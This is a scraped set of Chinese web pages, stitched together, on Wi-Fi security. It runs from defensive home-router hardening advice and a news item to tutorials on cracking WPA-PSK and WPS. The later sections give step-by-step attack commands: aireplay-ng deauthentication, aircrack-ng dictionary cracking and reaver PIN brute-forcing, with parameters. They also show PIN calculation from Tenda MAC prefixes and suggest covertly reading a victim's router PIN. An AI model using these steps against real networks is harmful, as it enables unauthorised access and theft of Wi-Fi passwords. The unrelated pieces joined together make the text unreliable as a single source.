如何解决无线网络安全漏洞整改方案

您好, []|
防止网络被蹭 如何让你的无线更安全
  第1页:建议用wpa2加密方式、复杂密码
  现在,随着“两类无线路由mac‘裸奔’易被蹭网”的新闻在网上热传,无线网络的安全问题再次让我们绷紧了神经。经验证,前6位mac地址是c83a35或00b00c的无线路由器,确实存在安全漏洞,只需使用一个特定软件就可以直接获得路由器的pin(个人识别密码)密钥,这不得不引起广大无线路由器用户的重视。面对越来越多变的蹭网手段,无线路由器的pin值正变得越来越脆弱,那么如何令我们的无线网络更加安全稳定呢?下面就同大家分享一些必要的无线路由器设定知识吧。
  建议用wpa2加密方式、复杂密码
  一些网络新人可能还没有认识到无线加密的重要性,在不加密的无线网络中,不仅用户的网络资源会被侵占,无线体验被干扰,而且个人的网络信息也可能遭受泄露,因此一定要通过正确的无线加密才能保障网络安全,维护自己的网络权益。
  那么我们常用的无线加密都有何种方式呢?一般分为如下三种:
  首先是wep加密,它是wired equivalent privacy(有线等效保密)的英文缩写。不了解的朋友,可能会将wep误以为是一个针对有线网络的安全加密协议,但事实上该协议早在无线网络的创建之初就已成型,它被定义为无线局域网必要的安全防护协议。目前常见的是64位wep加密和128位wep加密。
  其次是wpa加密,它是wifi protected access(wifi保护访问)的英文缩写。wpa协议是一种保护无线网络安全的系统,它包含两种方式:pre-shared密钥和radius密钥,其加密特性决定了它比wep更难以入侵。其中pre-shared密钥有两种密码方式:tkip和aes,而radius密钥利用radius服务器认证并可以动态选择tkip、aes、wep方式。它产生于wep加密,并解决了前任wep的缺陷问题。它属于ieee 802.11i标准中的过度方案,但也是现在主流的无线加密方式。
  再有就是wpa2,即wpa加密的升级版。它是wifi联盟验证过的ieee 802.11i标准的认证形式,wpa2实现了802.11i的强制性元素,特别是michael算法被公认彻底安全的ccmp(计数器模式密码块链消息完整码协议)讯息认证码所取代、而rc4加密算法也被aes所取代。
  对于目前的主流无线路由器,它们大都支持上述的多种加密方式,而其中,wpa2是目前被业界认为最安全的加密方式,建议个人用户使用(虽然在2010年国外黑客高手已完成了对wpa2加密的破解,但对一般想蹭网的不法分子还不能具有破解该加密的能力)。用户可选择“wpa2-psk [aes]”或“wpa-psk [tkip] + wpa2-psk [aes]”模式加密,密码越复杂越好。
建议用wpa2加密方式、复杂密码  但还需考虑的是,想连入网络的无线网卡或其它设备是不是能够支持相同的加密方式,因为一些老款无线网卡可能不具有最新的加密方式,这时,建议用户更换一款较新的网卡。
  第2页:wps加密省事不安全
  wps加密省事不安全
  对于现在多数的主流无线路由器来讲,都已经配备了wps一键加密功能,加密方式是变得简单快捷,但随着去年年底美国计算机应急准备小组(us-cert) 安全研究员stefan viehbock所发现的安全漏洞,将会使wps变得较为容易被暴力穷举pin的方法所破解。他称利用该漏洞可以轻易地在2小时内破解wps使用的pin码。随后其他安全公司也证实了该漏洞的存在。那么,我们首先了解下什么是wps一键加密吧。
  wps(wi-fi protected setup)是wi-fi保护设置的英文缩写。wps是由wi-fi联盟组织实施的认证项目,主要致力于简化无线局域网安装及安全性能的配置工作。wps并不是一项新增的安全性能,它只是使现有的安全技术更容易配置。
  对于一般用户,wps提供了一个相当简便的加密方法。通过该功能,不仅可将都具有wps功能的wi-fi设备和无线路由器进行快速互联,还会随机产生一个八位数字的字符串作为个人识别号码(pin)进行加密操作。省去了客户端需要连入无线网络时,必须手动添加网络名称(ssid)及输入冗长的无线加密密码的繁琐过程。
无线路由pin码连接
pin码认证过程  但现在发现的这个wps安全漏洞,让加密变得虽然省事可是却不安全了。而且针对这个wps漏洞,目前除了思科在官网上发出过警告外,尚未获得来自其他方面给出的更好的解决方案。同时现在极少有无线路由器具备限制密码出错次数的功能,这就令使用wps加密的路由设备暴露在黑客的破解攻击下。
思科在官网上发出警告  当然用户还是能够通过及时地禁用wps这项功能,来避免遭到攻击或侵入,可是大多数人目前还没意识到该漏洞的严重性而将之关闭。
  在此,我们建议仍在使用wps进行无线加密的朋友,在你的网络密码还没被“蹭网”者觊觎或尝试攻击破解之前,马上禁用wps功能,并且使用较为安全的wpa2手动加密方式进行无线密码设置,同时禁用upnp(通用即插即用)功能,启用mac地址过滤功能,才能较为有效地保护你无线网络的安全使用。
  第3页:禁用ssid广播 禁用dhcp功能
  禁用ssid广播 禁用dhcp功能
  如果是个人家庭的无线网络应用,我们建议在进行了无线加密的同时,还要禁用ssid广播和禁用dhcp功能。这是为什么呢?
  禁用ssid广播
  ssid是service set identifier(网络名称id)的英文缩写。当我们在搜索无线网络连接的时候,会看到一些无线网络源的名称,如下图,这些就是ssid了,它们是不同的用户给自己的无线网络所取的名字,来作为用户搜索无线网络信号时标明身份的标识符。
红框内都是搜索到的ssid  而一般无线路由器会默认将使用品牌名加上型号来作为ssid,这就为“蹭网”者提供了可乘之机,因此建议大家最好能将ssid改成较有个性的名字并将它隐藏起来。那么如何隐藏ssid呢?
禁用ssid广播  我们只需在无线路由器的web配置界面中,找到ssid广播,并将其禁用,就能将自己的无线网络隐藏了,在他人的搜索名单中,你的无线网络名称便不会被发现了。
  禁用dhcp功能
  dhcp是dynamic host configuration protocol(动态主机分配协议)的英文缩写,是一个简化主机ip地址分配管理的tcp/ip 标准协议,该功能会让路由器自动给无线客户端分配ip地址。而没有ip地址的计算机即使将它连到网络接口,它也无法连接到网络上。
  因此,我们只需要禁用dhcp功能,就能让无线路由起不再自动给无线客户端分配ip地址了。同时,建议修改无线路由器的默认ip地址,例如默认ip地址为:10.0.0.1,可改为192.168.10.1,以防被轻易猜到。
禁用dhcp功能  设置方法很简单,找到“局域网ip设置”菜单,然后修改默认ip地址,并取消勾选“将路由器用作dhcp服务器”,最后点击应用即可。
  第4页:启用mac地址过滤很重要
  启用mac地址过滤很重要
  mac是media access control(介质访问控制)的英文缩写,mac地址是底层网络来识别和寻找目标终端的标示,每个网卡或路由器都有一个唯一的mac地址。这样就可保证所有接入无线网络的终端都有唯一的不同的mac地址,而mac地址过滤技术就有了理论上的可行性。
  如何查看自己的mac地址呢?我们只需在电脑菜单上依次单击“开始”“运行”输入“cmd”回车,在出现的命令提示符界面中输“ipconfig /all”回车,就可以得到电脑客户端的mac地址了。
mac地址  在这里我们通过设置“防火墙 - mac访问控制”,来启用mac访问控制,然后键入上图的电脑的mac地址,其他未经允许的设备就无法连入无线路由器了。
使用mac访问控制,键入想接入mac地址  mac地址过滤的缺点
  虽然mac地址过滤可以阻止非信任的终端设备访问,但在终端设备试图连接路由之前,mac地址过滤是不会识别出谁是可信任的或谁是非信任的,访问终端设备仍都可以连接到路由器,只是在做进一步的访问时,才会被禁止。而且它不能断开客户端与路由器的连接,这样入侵者就可以探到通信,并从帧中公开的位置获取合法的使用mac地址。然后通过对无线信号进行监控,一旦授权信任的用户没有出现,入侵者就使用授权用户的mac地址来进行访问。
  由此可见,仅仅依靠mac地址过滤是不够的,我们必须启用尽可能多方面的安全防护手段来保护我们的无线网络。
  总结:多重防护齐上阵
  通过分析我们可以看到,单一的加密防护手段,能力都是有限的。建议如前面所说的禁用wps功能,采用手动设置wpa2加密,禁用ssid广播、dhcp功能和启用mac地址过滤等,从多角度全方位进行加密才是防止无线网络被蹭的好方法。如果你的路由器mac地址前6位是c83a35或者00b00c,则可以进行mac访问控制来绑定你的无线接入设备,最好再修改成新的mac地址。还可以使用低功率无线路由器,因为无线覆盖有个范围,只有在范围内,无线设备才会找到信号接入网络。总的说,为了维护自身无线网络的安全,建议大家要尽量多重防护齐上阵,将防护做到完善。
如果你对数码频道有任何意见或建议,请到交流平台反馈。【】
新闻排行财经科普科技数码
Copyright & 1998 - 2016 Tencent. All Rights Reserved多种路由器被曝存漏洞 使用无线网络别掉以轻心_新浪安徽新闻_新浪安徽
仍有部分厂商尚未提供安全解决方案或升级补丁
人民网 评论
  由于网络硬件设备升级通常较一般的应用软件难度更大,对普通用户来说,难以独自完成升级修复,这也是路由器安全隐患常常不被人注意的原因之一。
  从事网络安全维护工作多年的工程师李波告诉记者,用户安全意识匮乏是安全风险增大的重要原因之一。有的用户密码设置简单,往往就是或者自己的生日,这对于黑客没有太大难度。
  瑞信安全专家唐威表示,用户切实可行的防范方式是,尽量购买正规厂商的路由器,同时更改其出厂账号、服务器地址、密码。如果设置了安全方式和系数较高的密码,通过破解软件等简单手段入侵的可能性非常小。
  路由器生产厂商腾达公司近日也发布公告表示:强烈建议用户不使用厂商出厂默认的管理员用户名和密码,一定要对原始用户名和密码进行修改。同时,路由器完成设置后,直接关闭浏览器,忽略浏览器“记住用户名和密码”的弹窗提醒。
  王明华还提醒,用户要学会经常检查连接路由器的主机,如发现蹭网行为,应及时更换密码。同时,关闭互联网直接访问路由器的权限,“没有这个权限,即使存在后门隐患,路由器没有响应,也不可能出现入侵。”
  用户缺乏安全意识的另一个表现是在公共场所随意“蹭网”。越来越多的餐馆、咖啡厅等商家为消费者提供免费的无线网络,很多用户不加甄别地使用,殊不知自己的手机此时形同“裸奔”:如果该信号是不法分子故意设下的陷阱,那用户的上网行为都将被监控。李波为此提醒,“警惕陌生的无线网络,使用公共无线网络时一定要谨慎,不要登录网银账户或进行在线支付。”
口水直流湘菜馆
探店:喜欢:评论:
环境优雅幸福的味道
探店:喜欢:评论:
北京门户食府青年餐厅
探店:喜欢:评论:比特客户端
您的位置:
详解大数据
详解大数据
详解大数据
详解大数据
WPA-PSK无线网络破解原理及过程
关键字:WPA-PSK 无线网络 应用安全
  本文将主要讲讲WPA-PSK类型的网络安全问题,首先我们看下802.11协议相关的基础知识。
  802.11常见的几种认证方式:
  1、不启用安全‍‍
  ‍‍2、WEP‍‍
  ‍‍3、WPA/WPA2-PSK(预共享密钥)‍‍
  ‍‍4、WPA/WPA2 802.1X (radius认证)
  具体在的配置界面一般如下图所示:
  WPA-PSK的认证过程:
  由于我这里主要分析wpa-psk类型的认证方式,所以这里就不讨论其他的认证方式了,通过抓包分析,我们可以看到wpa-psk的大致认证过程分为以下几步。
  1、无线AP定期发送beacon数据包,使无线终端更新自己的无线网络列表。
  ‍‍2、无线终端在每个信道(1-13)广播ProbeRequest(非隐藏类型的含ESSID,隐藏类型的WiFi不含ESSID)。‍‍
  ‍‍3、每个信道的AP回应,ProbeResponse,包含ESSID,及RSN信息。‍‍
  ‍‍4、无线终端给目标AP发送AUTH包。AUTH认证类型有两种,0为开放式、1为共享式(WPA/WPA2必须是开放式)。‍‍
  ‍‍5、AP回应网卡AUTH包。‍‍
  ‍‍6、无线终端给AP发送关联请求包associationrequest数据包。‍‍
  ‍‍7、AP给无线终端发送关联响应包associationresponse数据包。‍‍
  ‍‍8、EAPOL四次握手进行认证(握手包是破解的关键)。‍‍
  ‍‍9、完成认证可以上网。
  802.11数据帧类型说明
  802.11协议的帧类型主要包括管理帧和数据帧,我们这里主要用到管理帧:
  管理帧的主体包含的固定字段与信息元素是用来运送信息的。管理帧主要以下几种,负责链路层的各种维护功能。
  1. Beacon 信标帧
  主要用来声明某个网络的存在。定期(默认100s、可自己设置)传送的信标可让station得知网络的存在,从而调整加入该网络所必需的参数。
  2. Probe Request 探查请求帧
  移动工作站利用Probe Request探查请求帧来扫描区域内目前哪些802.11网络。
  包含2个字段
  SSID:可被设定为特定网络的 SSID 或任何网络的 SSID 。
  Support rates:移动工作站所支持的速率。
  3.ProbeResponse探查响应帧
  如果ProbeRequest所探查的网络与之兼容,该网络就会以ProbeResponse帧响应。送出最后一个beacon帧的工作站必须负责响应所收到的探查信息。
  Probe Request帧中包含了beacon帧的所参数,station可根据它调整加入网络所需要的参数。
  4.IBSS announcement traffic indication map (ATIM)
  IBSS 的通知传输只是消息
  5.Disassociation and Deauthentication
  取消关联、解除验证帧
  6. AssociationRequest
  关联请求帧
  7.Reassociation Request
  重新关联
  8.Association Response and Reassociation Response
  关联响应、重新关联响应
  9.Authentication
  身份验证帧 ///Authentication Algorithm Number:用于算法择
  10.Action frame
  帧传送、关联与身份验证的状态
  State1 :未经认证且尚未关联 2 :已经认证但尚未关联 3 :已经认证且已经关联。
  下图是用科来包显示的帧类型:
  WPA-PSK认证四次握手认证的过程:
  WPA-PSK破解原理:
  用我们字典中的PSK+ssid先生成PMK(此步最耗时,是目前破解的瓶颈所在),然后结合握手包中的客户端,AP的BSSID,A-NONCE,S-NONCE计算PTK,再加上原始的报文数据算出MIC并与AP发送的MIC比较,如果一致,那么该PSK就是密钥。如图所示:
  WPA-PSK破解过程:
  接下来我们如何进行抓握手包破解WPA-PSK的无线AP,我这里用的工具是kali,kali Linux集成了aircrack套件。然后网卡使用的是rtl8187的外置USB网卡。
  破解步骤如下:
  第一步:把usb网卡插入虚拟机,并开启网卡到监听模式,命令如下:
  “ifconfig wlan0 up” 加载usb网卡。‍‍
  ‍‍“airmon-ng start wlan0” 监听模式已激活到mon0。(通过config 命令查看)。
  如果不开启监听模式会报错如下图:
  第二步:抓包查看有哪些无线网络,抓包的界面如下图所示:
  “airodump-ng mon0” 查看周边路由AP的信息。
  个人经验一般信号强度大于-70的可以进行破解,大于-60就最好了,小于-70的不稳定,信号比较弱。(信号强度的绝对值越小表示信号越强)
  第三步:选择要破解的WiFi,有针对性的进行抓握手包,命令如下:
  “ airodump-ng--ignore-negative-one -w /tmp/test.cap-c 11 --bssid 40:16:9F:76:E7:DE mon0”
  参数说明:-w 保存数据包的文件名 Cc 信道 Cbssid ap的mac地址
  (注意test.cap会被),也可以用其他工具抓包比如:wireshark、tcpdump,抓到握手包会有提示。
  第四步:为了顺利抓到握手包,我们需要使用DEAUTH攻击使已经连接的客户端断开并重新连接,以产生握手包。(注意:抓握手包破解必须有合法的客户端才行。)攻击命令如下:
  aireplay-ng-0 111 -a ap'mac mon1‍‍
  ‍‍aireplay-ng-0 3 -a B8:A3:86:63:B4:06 -c 00:18:1a:10:da:c9 -x 200 mon1
  参数说明:-0 Deautenticate 冲突模式 3 发包次数 -x 发包速度
  抓包可以看到很多deauthentication类型的数据包:
  包结构如下:
  抓到的数据包打开后如下图:图中使用wireshark打开的,EAPOL类型的数据包共有4个,即四次握手的数据包。
  第五步:接下来就是破解握手包,命令如下:
  aircrack-ng-w pass-haoyong.txt test-03.cap
  参数解释:-w 字典路径
  也可以使用图形化工具EWSA进行破解,Elcomsoft Wireless Security Auditor(EWSA)
  号称可以利用的运算性能快速攻破无线网络密码,运算速度相比使用CPU可提高最多上百倍。
  上面我们讲解了通过抓握手包破解WPA-PSK认证的无线AP的全过程,从上述过程可以看出,如果AP没有合法的客户端连接,或者密码设置的足够复杂就基本上不可能破解。
  通过WPS破解无线路由器密码
  接下来我们看一下另一种破解方式,也就是常说的pin码破解后者叫wps破解。首先了解下什么是wps:
  WPS(Wi-FiProtected Setup,保护设置)是由Wi-Fi联盟组织实施的认证项目,主要于简化无线网络的安全加密设置。
  功能:
  简化配置,快速配置一个基于WPA2的网络。
  快速连接,输入pin码或按下WPS键即可完成网络连接。
  问题:
  由于WPS存在漏洞,通过PIN码可以直接提取上网密码。
  通过WPS快速配置无线路由器
  我们可以通过WPS快速配置无线路由器:步骤如下
  1、通过电脑连接新买的无线路由器,提示通过pin码进行设置,界面如下:
  2、输入pin码下一步,就会为路由器自动生成一个足够复杂的认证方式及密码:
  通过WPS快速连接已有网络
  我们也可以通过WPS快速连接已有网络,不用输入复杂的密码:步骤如下(我使用小米进行测试)
  1、在手机上选择通过PIN码进行连接或通过路由器上的WPS按键连接。
  2、如果选择前者只需要输入pin码即可连接,如果选择的是后者则只需要按以下路由器上的wps键即可完成连接。
  Pin码破解的原理:
  由于WPS存在安全问题,通过PIN码可以直接提取上网密码。而pin码是一个8位的整数,破解过程时间比较短。WPS PIN码的第8位数是一个校验和,因此只需计算前7位数。另外前7位中的前四位和后三位分开认证。所以破解pin码最多只需要1.1万次尝试,顺利的情况下在3小时左右。Wps认证流程如下图:
  破解的操作步骤:
  第一步:Wash 扫描开启WPS的网络。
  wash-i mon1 CC
  第二步:穷举破解pin码,并通过获取的pin码得到无线AP上网密码。
  reaver-i mon0 -b 5C:63:BF:BA:44:DC -a -S -vv
  reaver参数说明:
  1. -i 监听后接口称号‍‍
  ‍‍2. -b APmac地址‍‍
  ‍‍3. -a 主动检测AP最佳配置‍‍
  ‍‍4. -S 利用最小的DH key(能够进步PJ速度)‍‍
  ‍‍5. -v、-vv 显示更多的破解信息‍‍
  ‍‍6. -d 即delay每穷举一次的闲置时候预设为1秒‍‍
  ‍‍7. -t 即timeout每次穷举守候反应的最长时候‍‍
  ‍‍8. -c指定频道能够便当找到信号,如-c1 指定1频道
  如果无线路由器没开wps功能会报错如下图:
  另外破解过程中无线路由器会有如下特征:
  破解成功后如下:
  如果之前破解的无线路由器密码被改了,可以直接通过pin码获取密码,命令如下:
  reaver-i mon0 -b MAC -p PIN8位数
  上面就是通过pin码破解无线路由器密码的全过程,可见开启wps功能并不安全,建议最好不要开此功能。
  最后介绍几个图形界面的工具:
  常用的图形界面的工具有水滴、打气筒、奶瓶:
  这些工具只是将Aircrack-ng、 reaver打包图形化,即为Aircrack-ng套件的GUI。
  1. Aircrack-ng是一个与802.11标准的无线网络分析关的安全软件,主要功能:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSKPJ。
  2. reaver,专用来pin PJ的软件、一般都集成在水滴等里面了。
  3. 另外我们常用的注:beini/CDlinux/xiaopan都是小型linux系统,已集成了上述工具。下图为水滴的界面。
  安全建议:
  1. 使用WPA2认证,不要使用wep或无认证。‍‍
  ‍‍2. 为无线网路设置复杂的密码。‍‍
  ‍‍3. 关闭WPS功能。
相关文章:
[ 责任编辑:小石潭记 ]
为更好推动开放架构发展,打造开…
甲骨文的云战略已经完成第一阶段…
软件信息化周刊
比特软件信息化周刊提供以数据库、操作系统和管理软件为重点的全面软件信息化产业热点、应用方案推荐、实用技巧分享等。以最新的软件资讯,最新的软件技巧,最新的软件与服务业内动态来为IT用户找到软捷径。
商务办公周刊
比特商务周刊是一个及行业资讯、深度分析、企业导购等为一体的综合性周刊。其中,与中国计量科学研究院合力打造的比特实验室可以为商业用户提供最权威的采购指南。是企业用户不可缺少的智选周刊!
比特网络周刊向企业网管员以及网络技术和产品使用者提供关于网络产业动态、技术热点、组网、建网、网络管理、网络运维等最新技术和实用技巧,帮助网管答疑解惑,成为网管好帮手。
服务器周刊
比特服务器周刊作为比特网的重点频道之一,主要关注x86服务器,RISC架构服务器以及高性能计算机行业的产品及发展动态。通过最独到的编辑观点和业界动态分析,让您第一时间了解服务器行业的趋势。
比特存储周刊长期以来,为读者提供企业存储领域高质量的原创内容,及时、全面的资讯、技术、方案以及案例文章,力求成为业界领先的存储媒体。比特存储周刊始终致力于用户的企业信息化建设、存储业务、数据保护与容灾构建以及数据管理部署等方面服务。
比特安全周刊通过专业的信息安全内容建设,为企业级用户打造最具商业价值的信息沟通平台,并为安全厂商提供多层面、多维度的媒体宣传手段。与其他同类网站信息安全内容相比,比特安全周刊运作模式更加独立,对信息安全界的动态新闻更新更快。
新闻中心热点推荐
新闻中心以独特视角精选一周内最具影响力的行业重大事件或圈内精彩故事,为企业级用户打造重点突出,可读性强,商业价值高的信息共享平台;同时为互联网、IT业界及通信厂商提供一条精准快捷,渗透力强,覆盖面广的媒体传播途径。
云计算周刊
比特云计算周刊关注云计算产业热点技术应用与趋势发展,全方位报道云计算领域最新动态。为用户与企业架设起沟通交流平台。包括IaaS、PaaS、SaaS各种不同的服务类型以及相关的安全与管理内容介绍。
CIO俱乐部周刊
比特CIO俱乐部周刊以大量高端CIO沙龙或专题研讨会以及对明星CIO的深入采访为依托,汇聚中国500强CIO的集体智慧。旨为中国杰出的CIO提供一个良好的互融互通 、促进交流的平台,并持续提供丰富的资讯和服务,探讨信息化建设,推动中国信息化发展引领CIO未来职业发展。
IT专家新闻邮件长期以来,以定向、分众、整合的商业模式,为企业IT专业人士以及IT系统采购决策者提供高质量的原创内容,包括IT新闻、评论、专家答疑、技巧和白皮书。此外,IT专家网还为读者提供包括咨询、社区、论坛、线下会议、读者沙龙等多种服务。
X周刊是一份IT人的技术娱乐周刊,给用户实时传递I最新T资讯、IT段子、技术技巧、畅销书籍,同时用户还能参与我们推荐的互动游戏,给广大的IT技术人士忙碌工作之余带来轻松休闲一刻。
微信扫一扫
关注ChinabyteWifi密码破解2:利用wps漏洞穷举PIN码破解wifi密码
得到PIN码,怎么破解路由的密码呢?Linux系统下我们可以使用 Reaver 软件破解出路由的密码;下图是通过路由器的PIN码得到wifi密码的效果图:
已知PIN码是&&
破解出密码是 & #$%
和暴力破解密码相比,利用wps漏洞穷举pin码破解密码不像暴力破解那样全靠字典和硬件,而且就算wifi主人修改密码,只要不更换pin码,也可以很快再次得到密码,但是必须要路由支持并开启WPS功能;如何得到路由的PIN 码呢?
1.最常用的方法是用reaver软件之类的软件进行穷举PIN码,reaver 命令:
& & &&& reaver -i mon0 -b mac -S -v -n
reaver命令参数(转):
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d& 即delay每穷举一次的闲置时间 预设为1秒
-t& 即timeout每次穷举等待反馈的最长时间
-c& 指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐&d9 &t9& 参数防止路由僵死
reaver -i mon0 -b MAC -a -S &d9 &t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
一个穷举过程:
在穷举的过程种reaver会生成以路由mac地址为名的wpc文件,一时半会pin不出来,第二天pin的时候命令加参数 -s file.wpc继续pin;或者多开几个终端窗口每个窗口都从不同的数字段开始pin,这样提高效率但也容易漏pin,比如&reaver -i mon0 -b mac -S -v -n -p 9000(窗口1) &&&reaver -i mon0 -b mac -S -v -n -p 8000 (窗口2) 。。。。。。最后得到pin码和psk码(也就是密码),如果以后人家修给密码,只要不关闭wps功能就可以用reaver -i mon0 -b mac -p xxxxxxxx来再次得到密码。
一段时间过后,穷举出密码:
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。
判断一个wifi信号是否开启了wps可以被探测出pin码,可以用airodump-ng命令或wash命令检测:
& & & &&1).airodump-ng:MB项的那个54e.和54e,是54e.的就可以探测pin
& &&2).wash -i mon0 -C:wps locked的那个项,YES的就可以被探测pin
利用wps漏洞破解wifi密码的软件还有wifite,bully等(具体看日志末尾的推荐阅读).
2.特殊路由的pin码可以通过计算得出
&&&&&& 有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以&C83A35&或&00B00C&打头那么可以直接计算出PIN值。
比如这个:bssid :Tenda_579A18 & &mac :C8:3A:35:57:9A:18 &通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!
当然还有腾达路由pin码计算器软件:
3.当然也可以假装干其他事,去人家看一下路由底部的pin码什么的。。。
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】

我要回帖

更多关于 网络安全漏洞的分类 的文章

 

随机推荐